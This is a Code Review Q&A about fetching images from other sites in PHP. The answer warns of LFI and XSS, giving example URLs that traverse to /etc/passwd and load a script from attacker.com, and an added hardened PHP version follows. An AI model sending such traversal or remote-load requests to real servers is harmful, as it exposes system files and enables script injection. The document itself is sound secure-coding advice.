Get image from other site in PHP
Problem
I would like to get images from other websites.
This is my current method but I'm not sure if it is alright.
If not, how should I do it?
Solution
Your code is vulnerable to LFI and XSS.
http://localhost/yourscript.php?url=../../../../../../etc/passwd
This would load the local file /etc/passwd and display it.
http://localhost/yourscript.php?url=http://attacker.com/xss.php
This would load and display the remote file xss.php, which would lead to XSS.
For better solutions, see e.g. here. When outputting images, you should use the image output functions such as imagejpeg, not generic file loading functions.
Code Snippets
http://localhost/yourscript.php?url=../../../../../../etc/passwd
http://localhost/yourscript.php?url=http://attacker.com/xss.php
Context
StackExchange Code Review Q#125030, answer score: 14
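A hardened version of the kind of script the answer describes, as an added example that is not code from the original question or answer. It accepts only absolute http/https URLs on an allowlisted host and re-encodes the response with imagejpeg, so neither a local path nor a non-image response is echoed back. The host allowlist, the size limit and the `url` parameter handling are assumptions, and the GD extension is required.

```php
<?php
// Added example. ALLOWED_HOSTS and MAX_BYTES are hypothetical values.
const ALLOWED_HOSTS = ['images.example.com'];
const MAX_BYTES = 5 * 1024 * 1024;

// Returns the URL if it is an absolute http(s) URL on an allowed host, else null.
function validate_image_url(string $url): ?string
{
    $parts = parse_url($url);
    // A relative path such as ../../etc/passwd has neither scheme nor host.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Rejects file://, php://, data:// and other stream wrappers.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    return $url;
}

// Fetches the URL and returns freshly encoded JPEG bytes, or null on any failure.
function fetch_image_as_jpeg(string $url): ?string
{
    $ctx = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $raw = @file_get_contents($url, false, $ctx, 0, MAX_BYTES);
    if ($raw === false) {
        return null;
    }
    // GD refuses anything that is not a decodable image (HTML, PHP source, text).
    $img = @imagecreatefromstring($raw);
    if ($img === false) {
        return null;
    }
    ob_start();
    imagejpeg($img, null, 85);   // output is re-encoded pixels, not the fetched bytes
    return ob_get_clean();
}

$url  = validate_image_url($_GET['url'] ?? '');
$jpeg = $url !== null ? fetch_image_as_jpeg($url) : null;
if ($jpeg === null) {
    http_response_code(400);
    exit;
}
header('Content-Type: image/jpeg');
header('X-Content-Type-Options: nosniff');   // browser must not sniff it as HTML
echo $jpeg;
```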